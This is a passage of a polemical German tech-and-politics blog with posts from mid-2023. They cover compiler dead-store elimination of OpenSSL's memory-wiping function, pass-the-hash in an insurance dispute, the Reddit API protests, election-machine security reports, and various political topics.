Das ist Unsinn, wie man sich auch ganz leicht selbst überlegen kann. Server sind ja normalerweise nicht isolierte Einzelstücke, sondern hängen in einem Vertrauensverhältnis, bei Windows im Allgemeinen Active Directory, und dann gibt es gemeinsame Accounts mit demselben Passwort zwischen den Kisten.
Wenn der Angreifer jetzt also auf einen ungepatchten Rechner raufkommt, und die anderen Kisten mit dem in einem Vertrauensverhältnis stehen, in dem man wie im vorliegenden Fall Pass the Hash machen kann, dann spielt selbstverständlich sehr wohl der Patchstand eine Rolle. Pass the Hash benutzt man, nachdem man drin ist, um sich benachbarte Server anzugreifen. Wenn alle Rechner ordentlich gepatcht gewesen wären, wäre der Angreifer gar nicht in eine Position gelangt, um Pass the Hash anwenden zu können.
Aus meiner Sicht ist das daher ein Fehlurteil. Wenn die Firma auch nur einen Server nicht gepatcht hatte zum Zeitpunkt des Angriffs, dann sollte die Versicherung gar nichts zahlen müssen.

Sat Jul 1 2023

[l] Ich könnte mich ja über diese Twitter-Situation stundenlang amüsieren.
Elon Musk soll auf Twitter irgendwas gesagt haben, aber ich kann es weder lesen noch verlinken. Presseanfragen an Twitter kriegen ja seit einer Weile nur noch automatisierte Poop-Emojis zurück.
Erstaunlicherweise hält das die Presse nicht davon ab, weiter von Twitter zu zitieren oder das zu verlinken. Warum auch. Haben sie ja davor auch jahrzehntelang gemacht. "The Guardian has obtained documents, ..."
Und die ganzen CDU-Wähler da draußen brauchen ja auch keine Quellenangabe und lesen eh keine Primärquellen. Warum also die Arbeit machen.
Und so könnte das für die Presse am Ende sogar vorteilhaft sein. Sie können wieder so tun, als hätten sie Zugang zu Herrschaftswissen, und die meisten Leute können ihre Behauptungen nicht prüfen. Schöne neue Welt.
Dass Twitter wegen LLM-Scraper zugemacht werden musste, scheint derweil übrigens höchstens ein Teil der Wahrheit zu sein. Softwareproblem. Kann man nichts machen. Twitter DDoSt sich selbst.

Tue Jun 27 2023

[l] Ich reverse hier gerade ein 64-bit ARM Binary, das OpenSSL statisch reinkompiliert hat. In einer älteren Version, aber das spielt hier keine Rolle.
OpenSSL hat eine Funktion namens OPENSSL_cleanse(ptr,len). Das ruft man auf Buffer auf, die gleich out of scope gehen, damit kein Schlüsselmaterial im Speicher rumliegt. Smarte Defense-in-Depth-Maßnahme. Inhaltlich ist das bloß ein memset(ptr,0,len).
Vor ein paar Jahren fiel auf, dass Compiler unter anderem die Funktion haben, sogenannte Dead Stores wegzuoptimieren. Das hier ist z.B. ein dead store:
```
void foo() {
  int i;
  for (i=0; i<5; ++i) {
    puts("huhu");
  }
  i=0;    /* Hat keine Auswirkungen, kann weg */
}
```
In welchem Kontext benutzt man jetzt OPENSSL_cleanse? In so einem hier:
```
  char key[128];
  [...]
  OPENSSL_cleanse(key,sizeof(key));
  return 0;
}
```
Wenn der Compiler versteht, dass OPENSSL_cleanse keine Seiteneffekte hat außer key zu überschreiben, dann ist das ein klarer Fall für die Dead Store Elimination. Ähnlich sieht es mit einem memset() vor einem free() aus.
Das ist vor ein paar Jahren aufgefallen, dass Compiler das nicht nur tun können sondern sogar in der Praxis wirklich tun. Plötzlich lagen im Speicher von Programmen Keymaterial herum. Also musste eine Strategie her, wie man den Compiler dazu bringt, das memset nicht wegzuoptimieren. Das ist leider in portablem C nicht so einfach. Hier ist, wie ich das in dietlibc gemacht habe:
```
 1 #include <string.h>
 2
 3 void explicit_bzero(void* dest,size_t len) {
 4   memset(dest,0,len);
 5   asm volatile("": : "r"(dest) : "memory");
 6 }
```
Das magische asm-Statement sagt dem Compiler, dass der Inline-Assembler-Code (der hier leer ist) lesend auf dest zugreift, was er aber nicht tatsächlich tut. Damit ist der memset kein Dead Store mehr und bleibt drinnen. Leider ist das asm-Statement eine gcc-Erweiterung (die aber auch clang und der Intel-Compiler verstehen).
Hier ist die Lösung von OpenSSL:
```
 18 typedef void *(*memset_t)(void *, int, size_t);
 19
 20 static volatile memset_t memset_func = memset;
 21
 22 void OPENSSL_cleanse(void *ptr, size_t len)
 23 {
 24     memset_func(ptr, 0, len);
 25 }
```
Die Idee ist, memset nicht direkt aufzurufen sondern über einen Function Pointer. Wenn man den volatile deklariert, dann muss der Compiler annehmen, dass sich der Wert asynchon ändern kann. Kann er aber nicht, weil da nie jemand was anderes als memset reinschreibt. Das kann gcc leider erkennen, weil die Helden von OpenSSL das static volatile deklariert haben, und es damit nur innerhalb dieser Compilation Unit sichtbar ist, und da sind keine anderen Zugriffe. Niemand nimmt auch nur die Adresse davon.
Wenn ich das mit einem aktuellen gcc 13.1 übersetze, kommt eine Zeiger-Dereferenzierung heraus. Aber in dem Binary kommt ein ... inline memset raus. Die haben ihr altes OpenSSL mit einem alten gcc gebaut.
Gut, der alte gcc ist nicht schlau genug, dann Calls zu OPENSSL_cleanse wegzuoptimieren, insofern ... Operation erfolgreich?
Ich blogge das hier, damit ihr mal gehört habt, dass es im Umgang mit immer schlauer werdenden Compilern Untiefen gibt, die man möglicherweise intuitiv nicht auf dem Radar hat.
Update: Wenn ihr in eurem Code das Problem habt, könnt ihr explicit_memset nehmen, das setzt sich gerade unter Unix durch, oder explicit_bzero, das kam von den BSDs, oder memset_s unter Windows. Die Situation ist immer noch insgesamtn unbefriedigend.
Update: Mit C23 kriegen wir dann endlich memset_explicit. Ist dasselbe wie explicit_memset. Habe ich gerade mal in dietlibc eingepflegt.

Wed Jun 21 2023

[l] Hunter Biden hat einen Plea Deal angenommen.
A court filing from David Weiss, the US Attorney for District of Delaware, said that the president’s only living son will plea guilty to two federal charges of willful failure to pay federal income tax one charge of a firearm by a person who is “an unlawful user or addicted to a controlled substance.” At the time, Mr Biden, the sole surviving son of the president’s first marriage, was actively addicted to drugs.
Kontext für die Geschichte: 2014, 2020 und Nachschlag. Die Republikaner versuchen seit Jahren, Hunter Biden irgendwelche pädophilen Satanisten-Korruptionsverschwörungen anzuhängen, mit fremschämwürdigen Mitteln. Trotz prominenter Fürsprecher wie Glenn Greenwald ist bisher nichts hängen geblieben.
Ist das jetzt anders? Hmm. Also von Pädophilie und Korruption sehe ich da nichts. Auf der anderen Seite kann es natürlich sein, dass Joe Biden seinem Sohn gesagt hat, er soll mal ein paar Bagatelldelikte zugeben, damit er sagen kann, der Rechtsstaat habe die Sache untersucht und aufgeklärt. Eine Schusswaffe illegal zu führen ist in den USA eine Ordnungswidrigkeit, die mit bis zu einem Jahr Gefängnis oder $2500 Strafe bewährt ist. Wenn Biden einen Deal gemacht hat, dann wird er mit weniger Strafe wegkommen.
Der andere Punkt ist Steuerhinterziehung. Nunja. Das kann man jetzt als "machen eh alle" sehen, oder man kann sich an Al Capone erinnert fühlen, den sie am Ende auch wegen Steuerhinterziehung drangekriegt haben, weil man den Rest nicht nachweisen konnte.
Die ganzen republikanischen Verschwörungstheorien sind hier jedenfalls nicht belegt worden. Ich bin ja fast ein bisschen überrascht, dass die Democrats das nicht noch mehr unter den Teppich gekehrt gekriegt haben. So ala "er macht zwei Wochen Community Service" oder so.
For the record: Die Laptop-Nummer halte ich immer noch für Bullshit. :-)

Tue Jun 20 2023

[l] Gute Nachrichten! Es gibt eine neue Krypto-Börse. Gutes Timing auch! Fängt direkt nach dem reihenweisen Untergang der anderen an. Wartete noch Binance ab, ging dann live.
Und wer betreibt diese neue Krypto-Börse? Wieder irgendwelche schmierigen Scammer aus dem Internet? Nein, nein!
These firms join a coalition of founding investors, including Charles Schwab, Citadel Securities, Fidelity Digital AssetsSM, Paradigm, Sequoia Capital, and Virtu Financial.
Da fehlen ja nur noch Goldman Sachs und HSBC in der Liste der Old School Bankster! Was meint ihr, haben die über ihre Kumpels bei der FTC dafür gesorgt, dass die Konkurrenz vorher plattgemacht wird?

Sat Jun 17 2023

[l] Einer der größten abtrünnigen Subreddits ist /r/pics, und die hatten jetzt ein Problem. Kontext.
Wenn Mods einen Subreddit abgeschaltet haben, hat Reddit die Mods rausgeschmissen und andere ernannt und ihn wieder aufgemacht.
/r/pics hat eine brillante Lösung gefunden: Sie bleiben technisch offen, aber erlauben nur noch Bilder von John Oliver (von Last Week Tonight). So greift Reddits Bullshit-Regel nicht, mit der sie ihre Moderator-Rausschmisse begründet haben.
Die Idee war auch kein Alleingang der Mods, sondern sie haben eine Umfrage unter den Mitgliedern gemacht.
Das ist mal eine coole Protestform!
Update: John Oliver hat gehört, dass /r/pics nur noch Bilder von ihm nimmt, und liefert nach :-)

Fri Jun 16 2023

[l] Habt ihr das auch gehört? Wahlcomputer sind voll sicher!1!! Hat die CIA herausgefunden.
Oh nee, warte. Hat MITRE herausgefunden.
Mitre? Die berühmten Bürokraten, die anderer Leute Sicherheitslücken sammeln, ohne selbst irgendeine Art von Kompetenz auf dem Gebiet zu haben?
Nein, nein, Fefe. Du bist voll gemein. Lass uns mal gemeinsam gucken gehen, was Mitre selbst glaubt, was sie tun.
We discover new possibilities through objective insight and trusted access that brings data to decisions.
Hmm hmm. OK. But what do you DO?
We create unexpected opportunities from a unique vantage point, working across the whole-of-government to freely adapt proven strategies to new challenges.
Hmm hmm. OK. But. What. Do. You. DO?!
We lead by pioneering together for the public good, bringing innovative ideas into existence.
OK liebe Leser, ihr seht selbst. Auch Mitre hat keine Ahnung, was sie eigentlich tun. Daher nebelwerfen sie auf ihrer Homepage diese Hohlphrasen, und hoffen, dass keiner merkt, wie hohl diese Hohlphrasen sind.
Jedenfalls. Diese kompetenzfreien Bürokraten-Sesselfurzer haben einen Report über die Sicherheit von Wahlcomputern in Georgia geschrieben. Wieso ist das jetzt ein Aufreger? Nun, ganz einfach:
Anders als Halderman und dessen Co-Autor Springall habe Mitre keinen Zugriff auf Dominions Wahlmaschinen gehabt und keinerlei Sicherheitstests vorgenommen. Stattdessen habe Mitre versucht, das Risiko potenzieller, von Halderman und Springall beschriebener Angriffe ohne essenziellen Zugriff auf die Informationsquellen zu bewerten. Dementsprechend verwende die Mitre-Analyse fehlerhafte Begründungen und untertreibe das Risiko des Missbrauchs gefährlich mit der Behauptung, die Angriffe seien "operativ nicht durchführbar".
Wenn ihr euch jetzt denkt, Halderman? Kenn ich nicht! Kann ja jeder kommen!1!! Dann lasst mich kurz ausführen, dass Halderman der weltweit führende Spezialist für Wahlcomputer-Sicherheit ist, und seine Forschungsgruppe über die Hälfte der relevanten Untersuchungen durchgeführt hat auf dem Gebiet. Wenn es eine Koryphäe zu dem Thema gibt, ist es Halderman.
Oh, und Halderman steht hier auf der anderen Seite der Nummer. Er hat nämlich eine Analyse zu diesen Wahlcomputern gemacht, und einen Haufen Lücken gefunden, darunter wirklich üble. Die hat er gefunden, weil er im Gegensatz zu Mitre Zugriff auf den in Frage stehende Wahlcomputer hatte. Die kämpfen also nicht mal in derselben Liga. Halderman weiß, was er tut, und wovon er spricht, und hatte Zugriff auf die Systeme. Mitre weiß nicht, was sie tun, und wovon sie sprechen, und hatten keinen Zugriff auf die Systeme.
Lasst euch also nicht von Mitre blenden, nur weil die mehr schlecht als recht eine schrottige Liste von Sicherheitslücken führen, die jemand anderes gefunden hat.
[l] Ihr habt ja wahrscheinlich gehört, dass Reddit gerade schwere See durchkreuzt. Die haben unilateral angekündigt, dass ihre APIs jetzt kostenpflichtig werden, aber da erst eine Nebelkerze angehängt, dass es sich bloß um "wir grasen die ganze Site für unser KI-Schrottprojekt ab" handelt.
Dann kam völlig überraschend raus, dass es auch reguläre Apps betrifft. Die Apps, die Reddit überhaupt erst groß gemacht haben. Reddit hat eine eigene schrottige App gebaut, aber die kann mit den anderen Apps inhaltlich nicht konkurrieren, also klemmt Reddit die anderen Apps jetzt halt unter Ausnutzung ihres Marktmonopols ab.
Daraufhin haben diverse Subreddits angekündigt, aus Protest "schwarz" zu gehen. Das gab es schon häufiger, hat nie lange gehalten. Dementsprechend hat der Reddit-CEO dann eine Mail rumgeschickt intern, dass die Leute mal ein paar Tage ihre Reddit-Logos auf Kleidung und Taschen und Laptops verstecken sollen, und in ein paar Tagen ist der Spuk vorbei. Wir sitzen das jetzt aus.
Die Mail leakte. Das hat die protestierenden Subreddits angefeuert, den Protest noch nicht einzustellen.
Und jetzt? Jetzt haben Leute beobachtet, dass Reddit undelete auf alte gelöschte Inhalte macht, d.h. löschen war bei denen nicht löschen sondern "als gelöscht markieren".
Außerdem geht das Gerücht um, dass Reddit widerspenstige Moderatoren entmachtet.
Hier sieht man mal wieder, wieso es eine schlechte Idee ist, eine kommerziellen Firma eine Plattform stellen zu lassen. Das ist bisher noch immer ein Reinfall geworden, so halt jetzt auch hier.
Die Situation wird sich auch nie verbessern, solange ihr solchen Plattformen Macht gebt, indem ihr ihnen eure Inhalte und Aufmerksamkeit schenkt.
Update: Noch kurz zur Einordnung. Der Inhalt bei Reddit kommt von unbezahlten Usern, von denen Reddit am besten noch Geld haben will jetzt. Die Moderation und damit die Wertschöpfung kommt von unbezahlten Moderatoren, die sagen, dass das nur mit 3rd party Apps zu leisten ist, und von denen Reddit jetzt auch noch Geld haben will. Das Geld kassiert Reddit, die außer ein paar ranzige AWS-Dienste zu mieten und Firmen Werbung einblenden zu lassen keine Leistung erbracht haben.
Wie ein Hohn muss einem da diese Aussage des CEO von Reddit vorkommen:
It's time we grow up and behave like an adult company
Wie, ihr wollt jetzt anfangen, eure Mitarbeiter zu bezahlen? Whoa whoa whoa, ruhig Brauner! Nun wollen wir hier mal keine absurden Ideen in die Welt setzen!1!!

Mon Jun 5 2023

[l] Heise lässt verkünden: CIA ist tot. Nicht der Geheimdienst. Die Dimensionen für Sicherheitsanalyse: Confidentiality, Integrity und Availability.
Warum sind die tot? Steht da nicht. Aber anhand der vorgeschlagenen neuen Dimensionen kann man riechen, von wo der Wind weht:
Das neuere DIE-Sicherheitsmodell (Distributed, Immutable, Ephemeral) ist ein Konzept in der Informationssicherheit, das auf die drei Aspekte Verteilung, Unveränderlichkeit und Vergänglichkeit von Daten abzielt.
Na? Gemerkt? Hier wird Ergebnis-Kontrolle durch Implementationsdetails ersetzt. Und zwar Cloud-Heini-Implementationsdetails.
Das ist wie wenn du eine Kategorie "Objekt-Orientierte Datenhaltung" einführst. Das bedeutet nichts. Das hilft niemandem. Das ist Verkaufs-Blablah von Cloud-Heinis, die nicht auf die tatsächlichen Auswirkungen ihrer Vorschläge angesprochen werden wollen. Das ist "It's got electrolytes", falls ihr Idiocracy kennt.
Bislang, wenn jemand deine Daten geklaut hat, war die Confidentiality (Vertraulichkeit) beschädigt. das war nicht zu verhandeln. Wenn jemand deine Daten per Ransomware verschlüsselt, war die Availability weg. Wenn jemand deine Daten ändert, war die Integrity futsch.
Die neuen Kategorien geben diese Analyse nicht her. Die lügen dir direkt ins Gesicht, dass es sowas wie "vergängliche Daten" gibt. Gibt es nicht. Daten werden nicht schlecht. Wenn ich die heute auslese, kann ich die morgen, nächste Woche oder in 100 Jahren gegen dich verwenden.
Das neue Modell lügt dir ins Gesicht, dass das für dich als Kunden relevant ist, ob der Dienst die Daten verteilt oder zentral speichert. Spielt überhaupt gar keine Rolle für dich. Für dich ist wichtig, ob jemand unbefugt rankommt.
Was sollen denn die neuen Kategorien dann? Das sind Cloud-Kategorien! Da geht es nicht um Sicherheit, sondern es geht um das Errichten einer Nebelwand. Oh, und natürlich will dir hier jemand was verkaufen. So Golfplatz-mäßig. Habt ihr schon verteilte Datenhaltung?
Immutable kann helfen, wenn es um die Integrität von Daten geht. Wenn es um die Verfügbarkeit oder Vertraulichkeit geht, hilft das nicht. Distributed kann helfen, wenn es um die Verfügbarkeit geht, aber für Integrität tut es nicht viel und für die Vertraulichkeit ist es sogar kontraproduktiv.
Wieso also hier von Zielen auf Implementationsdetails umschwenken? Weil die Leute keinen Bock haben, ihre sinnlosen Schlangenöl-Maßnahmen gegen tatsächliche Auswirkungen bewerten zu lassen. Die Leute wollen lieber "wir haben die Daten verteilt" sagen, als sich auf Diskussionen einzulassen, was dem Kunden das bringt. In praktisch allen Fällen bringt das nämlich gar nichts. Aber man kann sich gegenseitig auf die Schultern klopfen und so tun, als haben hier nicht Geld verbrannt sondern einen Fortschritt erzielt.
Darum geht es hier aus meiner Sicht. Leute haben keinen Bock, ihre Leistung nach Auswirkungen oder anderen konkreten Kriterien bewerten zu lassen. Weil man dann sieht, dass sie nicht nur gar nichts geleistet haben, sondern die Sache sogar schlimmer gemacht haben, weil es jetzt eine Komplexitätsexplosion gab, die in der Zukunft im Weg stehen wird.
Lasst euch also nicht von irgendwelchen Cloud-Heinis verarschen, die euch irgendwelche Modelle reindrücken wollen, die die fundamental in einer Cloud-Umgebung nicht erbringbaren Anforderungen mit Neologismen und Schlangenöl-Bullshit zu übertünchen versuchen.
Besteht weiterhin auf einer Bewertung nach den konkreten Auswirkungen. Lasst euch nicht mit "aber wir haben da drüben eine Komponente immutable gemacht" abspeisen. Wichtig ist, ob eure Daten geklaut werden können oder nicht.
[l] Erinnert ihr euch noch an den Dieselskandal?
Nun, der ist natürlich noch nicht vorbei. Die haben bloß ein paar Handbewegungen gemacht, in der Hoffnung, dass die Aufmerksamkeitsspanne der Leute kurz genug ist, dass das schnell in Vergessenheit gerät.
Dennoch zeigten nach Darstellung des ICCT unter der Maßgabe der nun geltenden Einschränkungen gut 85 Prozent der Euro-5- und 77 Prozent der Euro-6-Diesel „verdächtig hohe Emissionen“, wie die Forscher am Donnerstag berichteten. In 40 Prozent der Fälle hätten sich sogar „extreme“ Werte für gesundheitsschädliche Stickoxide (NOx) ergeben.
ICCT? Das sind doch bestimmt so ein paar Partisanen, deren Messungen man nicht trauen kann!1!!
Die Zahlen basieren nicht auf eigenen Erhebungen, sondern auf einer großen Testdatenbank sowie Zweitauswertungen zu Abgastests von Behörden und Organisationen, die seit 2016 liefen.

Sat Jun 3 2023

[l] In Utah liefern sich konservative und liberale Aktivisten ein Gefecht der besonderen Art. Die regierenden Konservativen haben ein Gesetz gemacht, um Bücher aus Schulbibliotheken zu verbannen, in denen queere Lebensführungen vorkommen. Oder Sex oder Gewalt. Weil, äh, schützt die Kinder und so.
Daraufhin haben oppositionelle Aktivisten die Bibel aus den Schulbibliotheken verbannen lassen, weil da ja auch schlimme Dinge drinstehen.
Das ist jetzt aber nicht so ein krasser Sieg wie man denken würde, weil Utah die Heimat der Mormonen ist, und die haben das Book of Mormon. Daher ist jetzt der nächste Schritt ein Verbotsantrag für das Book of Mormon.
Die Chancen stehen nicht schlecht, denn da kommen u.a. Köpfungen vor.

Tue May 30 2023

[l] Wiederbelebung durch Brustkompression funktioniert offenbar nur im Fernsehen gut (dort ca 70%). Im echten Leben sind es eher so 7%.
Schlimmer noch: Die Hälfte der Überlebenden wäre lieber nicht wiederbelebt worden, weil das eine sehr traumatische Prozedur ist.
Mit dem hohen Alter sinkt die Erfolgswahrscheinlichkeit weiter. Von den Überlebenden über 85 tragen nur 2% keinen signifikanten Hirnschaden davon.
Update: Mehrere Ärzte haben mir geschrieben, dass das schon gut funktioniert — im Krankenhaus. Da merkt man nämlich sofort, wenn jemand Probleme hat, und dann dauert es keine Minute, bis jemand da ist und wiederbelbt, und derjenige ist dann auch ausgebildet und macht das richtig. Da ist die Erfolgsquote dann sehr hoch.
Ein anderer Leser schrieb, dass Zürich einen Feldtest gemacht hat, dass alle Polizisten ordentlich ausgebildet wurden dafür, und wenn ein Notruf reinkommt, schickt man erstmal einen Streifenwagen, der normalweise in 2 Minuten da ist. Das hat die Überlebensquite bei Herzversagen wohl deutlich erhöht.

Wed May 24 2023

[l] Leserbrief zum Komplex Öko-Institut und Klimakatastrophe:
Du machst in Deiner Argumentation einen schweren Fehler, wenn Du argumentieren willst, dass Klimaschutz an sich ja etwas gutes sei.
Damit überzeugt man viele Leute nicht mehr. Die Klimaschutzgegner haben aus Klimaschutz inzwischen erfolgreich eine Verschwörungstheorie gemacht.
Während der Diskussion über das Heizungsgesetz habe ich den "Fehler" gemacht, mich in die Tiefen des Spiegel Online Forums zu begeben.
Hintergrund ist der, dass ich meinen eigenen Haushalt gerade mit Wärmepumpe (*) und Elektroauto frei von fossiler Primärenergie gemacht habe und somit auf die üblichen Zweifel und Argumente gegen Wärmepumpen mit den eigenen (positiven) Erfahrungen antworten kann.
Bei den Diskussionen in der Forumskloake wird einem klar, dass die Gegner der Grünen es geschafft haben, Klimaschutzmaßnahmen zu reframen als etwas böses.
Die Verschwörungs-Story geht zusammengefasst so:
Klimaschutz ist teuer, deshalb kann sich das nur eine Minderheit von reichen urbanen Avocadotoast-Essern leisten. Diese elitären grünen Gutmenschen sind der Feind. Sie können aus ihrer abgehobenen Positionen heraus nicht mehr verstehen, was der Normalbürger erleiden muss.
Klimaschutz ist keine wirtschaftliche Notwendigkeit, sondern nur eine Lifestyle-Entscheidung und ein deutscher Sonderweg. Die Grünen wollen dies unserem Land aufzwingen, während andere Länder, mit denen wir in Konkurrenz stehen, weitgehend nichts für den Klimaschutz tun und damit besser fahren. Während Deutschland seine AKWs abschaltet, bauen sie anderswo Kohlekraftwerke. Warum soll Deutschland sich beim Klimaschutz anstrengen, wenn die anderen eh nichts tun und wir doch eh nur für wenige Prozent der Klima-Emissionen verantwortlich sind?
Die deutsche Industrie kann sich Klimaschutz nicht leisten und wird Deutschland verlassen. Dies ist von den Grünen so gewollt, weil sie den Kapitalismus verachten und Deutschland deindustrialisieren wollen.
Der normale Bürger wird durch Klimaschutz verarmt werden. Die kranke Oma wird wegen des teuren Heizungswechsels aus ihrem vom Mund abgesparten windschiefen Häuschen rausgeworfen. Dies ist von den Grünen so gewollt, weil sie privates Eigentum verachten.
Einige gehen dann noch weiter und wittern Great Replacement: Wenn man die Normalbürger über Klimaschutz verarmt, kann man die leeren Häuser mit leichter kontrollierbaren Flüchtlingen füllen.
Damit ist Klimaschutz reframed zu: Die Grünen haben sich verschworen, um Deutschlands Wirtschaft in den Rücken zu dolchen und Deutschlands fleißige Mittelschicht zu vertreiben.
Und deshalb sehen die Gegner in Klimaschutz etwas ganz anderes als ein Projekt für eine bessere Zukunft. Für sie ist es eine sinistre Verschwörung der Mächtigen gegen sie, die Mehrheit.
So wird aus der Graichen-Affäre "Clankriminalität" - weil die grünen Verschwörer versuchen, die Machtpositionen zu besetzen in ihrem Plan gegen Deutschland.
Besorgniserregend ist, dass dies alles keine Stichworte allein der AfD sind. Man hört vieles davon ebenso aus der FDP und CDU.
(*) P.S.: Wärmepumpen im Altbau funktionieren prima.
Update: Ein Leser aus der Schweiz schickt diesen thematisch passenden Rundbrief aus der Schweiz ein, der dort wohl einmal an jeden Haushalt ging.

Mon May 22 2023

[l] Gute Nachrichten! Nein, diesmal wirklich! Alternativlos 51 ist fertig!
Eine der häufigsten Zuschauer-Anfragen an uns ist seit Jahren, nochmal zum Wendelstein 7-X zu fahren. Das haben wir jetzt endlich gemacht, und das Ergebnis sind knapp zweieinhalb Stunden.
Die Gesprächspartner waren sogar dieselben wie bei Sendung 36 damals.
In dem Zimmer, in dem wir aufnahmen, lief eine Klimaanlage, die leider nicht nur ein konstantes Spektrum zugemüllt hat, sondern deren Jamming sich im Spektrum hoch- und runterbewegte. Frank hat in einer heroischen mehrtägigen Aktion das Audio gefiltert. Man hört daher im Endprodukt kaum was davon. Aber ihr könnt uns glauben, dass das viel Arbeit war.
Es gibt noch eine winzige technische Neuerung: Ich habe Vorbis rausgeschmissen. Jeder, der Vorbis kann, kann jetzt auch Opus.
Und dann gibt es noch eine größere technische Neuerung: Ich habe mich mal reingearbeitet, wie man bei HTML5-Audio-Elementen herumspringen kann, damit ich eine Timeline mit Links haben kann. Das ist leider nur per Javascript verfügbar, jedenfalls soweit ich weiß. Wer weiß, wie man das ohne Javascript macht: Bitte bei mir melden.
Inhaltlich wollten wir natürlich vor allem drei Fragen klären: Wo bleibt das Fusionskraftwerk, das uns alle retten wird? Was dauert denn da so lange? Wie teuer wird es?
Die Frage nach dem Geld erscheint in Zeiten, in denen Habeck ohne Baugenehmigung ein LNG-Terminal bauen lässt, eher zweitrangig, aber das will wahrscheinlich der eine oder andere trotzdem wissen.
Hier sind die Antworten:
1. Das müsste mal jemand bauen, das Fusionskraftwerk.
2. Die Risiken sind rein wirtschaftlicher Natur.
3. Man könnte morgen anfangen, wenn man wollte, und in 5 Jahren fertig sein.
4. Eine realistische Kostenschätzung wäre so um die 20 Milliarden Euro.
Frank findet ja, solche Projekte sollte man nicht in Euro sondern in F-35 abrechnen, weil Fußballfelder nicht passen. Kanada zahlt pro F-35 umgerechnet 300 Mio Euro, d.h. wir wären bei 66 F-35 für ein Fusionskraftwerk. Und das wäre der Prototyp, die Nachfolger wären billiger. Der Markt regelt das leider nicht, weil der Markt an Profitmaximierung interessiert ist, und daher erst einsteigt, wenn der Steuerzahler das Risiko übernommen hat. Daher ist hier die eigentliche inhaltliche Botschaft: Wenn wir JETZT 20 Milliarden in die Hand nehmen, und das richtig mit Verve angehen, ist das erste Kraftwerk noch in diesem Jahrzehnt fertig. Allerdings, auch wichtig: Das wird uns nicht retten. Retten wird uns, dass wir die ganze Zeit auch die Erneuerbaren ausbauen und hoffentlich auch mal jemand in Energiespeicher investiert.
Falls aber zufällig einer von euch Bill Gates oder einen russischen Oligarchen kennt, der auf 20 Milliarden sitzt, die er gerne ausgeben würde, dann wäre jetzt die Gelegenheit für das Unterbreiten eines Geschäftsvorschlags.
Oder, ihr wisst schon, wenn ihr Lindner oder Habeck wäret. An der Stelle sind die sich ja sogar mal inhaltlich einig. Müsste nur mal jemand anfangen!
Viel Spaß beim Hören! Wir haben später auch noch ein paar Fotos für euch, und Frank wollte auch noch von unserem Anreiseexperiment berichten, denn wir haben uns einen Tesla gemietet, um diese E-Mobilität mal auszuprobieren, von der man immer hört.
Update: Frank hat einen Blogbeitrag mit Fotos veröffentlicht.

Sat May 20 2023

[l] Kennt ihr das, wenn ihr vor vielen Jahren einen Film geguckt habt, und ihn dann nochmal guckt, und er ist noch schöner als in eurer Erinnerung?
Das kommt nicht zu oft vor, aber mir ist es gerade so gegangen: Mit Ghost Dog von Jim Jarmusch.
Jarmusch hat ja mit Night on Earth einen der wunderbarsten Filme aller Zeiten gemacht (besonders liebe ich das Helsinki-Segment), aber als ich Ghost Dog das erste Mal gesehen habe, kannte ich weder Night on Earth noch hatte ich je von Jim Jarmusch gehört.
Ghost Dog war damals schon toll, aber aus heutiger Sicht ist er geradezu erholsam anders. Heutige Produktionen versuchen gerne, alle Sinne so zu überfluten, dass man fast betäubt aus dem Film herauskommt, und es dann Wochen braucht, bis einem auffällt, dass da außer CGI-Greenscreen-Explosionen nichts war. Ghost Dog ist ein Film alter Schule. Nach 37 Minuten öffnet der Protagonist zum ersten Mal den Mund.
Ich finde auch, dass Jarmusch die besten Stadt-Filme macht. An den Locations, aus denen er Poesie macht, laufen andere vorbei.
Seufz.
Es war lange Zeit schwierig den Film zu gucken. Es gab mal eine schrammelige DVD, die ist längst überall aus dem Handel geflogen und man hätte die gebraucht auf Ebay kaufen müssen. Vor ein paar Jahren hat die Criterion Collection den Film restauriert und auf Blu-Ray rausgebracht.
Der Soundtrack von RZA ist auch legendär.

Thu May 18 2023

[l] Aus Ungarn hört es gar lustige Korruptionsgeschichten.
Hohlmeier schildert dabei eine offenbar gängige Praxis: "Es taucht regelmäßig jemand auf, der zunächst mal anfragt, ob er nicht zum Billigpreis das Unternehmen kaufen könnte. Wenn das Unternehmen antwortet, dass es beabsichtigt, weiter hier tätig zu sein und sogar auszubauen, dann beginnen erneute, weitere Drangsalierereien. Die reichen wirklich bis zu Besuchen bei Familien zu Hause."
Naja gut, denkt ihr euch jetzt vielleicht, so einen Pferdekopf vor der Haustüre kennt man ja aus Sizilien. Das ignoriert man halt weg. Aber wartet, geht noch weiter!
Dazu kommen Inspektionen oder behördliche Anordnungen. Oft werden Genehmigungen zur Teilnahme an Förderprogrammen der EU nicht erteilt. Die Unternehmen sollen mürbe für einen Verkauf gemacht werden. "Und wenn sie immer noch Widerstand leisten", so die Erkenntnis von Monika Hohlmeier, "dann macht man neue Maßnahmen. Wenn es ein Gerichtsurteil gibt, gibt’s am nächsten Tag ein neues Gesetz, eine neue Verordnung, um sie wieder ins Minus zu treiben. Es waren hier Unternehmen, die jährlich mit einem Minus von 70 Millionen, 80 Millionen, 100 Millionen kämpfen müssen."
Und am Ende gehört dann alles Orbans Oligarchen-Kumpels, da hilft dann auch ein Regierungswechsel nicht mehr.
Update: Ja, DIE Monika Hohlmeier. Wenn sich jemand mit Korruption auskennt, dann ja wohl die! Das muss richtig schlimm sein, wenn sich Monika Hohlmeier über Korruption dort aufregt.

Fri May 12 2023

[l] Erinnert ihr euch noch an den Cyberclown? Den ehemaligen BSI-Chef? Der dann über eine Böhmermann-Sendung voller Konjunktive und weitgehend beweisfreiem Herumgeraune stürzte?
Ich hatte damals berichtet und kommentiert, dass ich den Schönbohm nicht mag und mit seiner Arbeit und der Arbeit des BSI unzufrieden bin, aber er nicht wegen dieser Scheiße zurücktreten sollte, sondern weil er schlechte Arbeit macht.
Nun, die Faeser hat ihn damals geschasst. Feuern konnte sie ihn nicht mangels Beweisen, denn der Schönbohm ist ja im Gegensatz zu der Faeser zwar nicht inhaltlich aber wenigstens prozedural ein Profi und hat sich immer alles abzeichnen lassen, bevor er es gemacht hat.
Jedenfalls hat die Nummer jetzt ein Nachspiel. Setzt euch fest hin, denn das wird euch sonst aus dem Stuhl fegen!
Nun, sechs Monate später, steht fest: Die Vorwürfe waren offenbar haltlos. Nach unseren Informationen aus Regierungskreisen räumte das Innenministerium Ende April in einem entsprechenden Schreiben an Schönbohms Anwälte ein: Die sechsmonatigen behördeninternen Voruntersuchungen hätten keine Anhaltspunkte gebracht, die die Einleitung eines Disziplinarverfahren rechtfertigen würden.
Ach. Ach was.
Da stellt sich mir direkt eine Frage, von der ich mir wünsche, dass sie auch von anderen gestellt wird: Ist die Faeser schon zurückgetreten? Wenn nein: Warum nicht?!
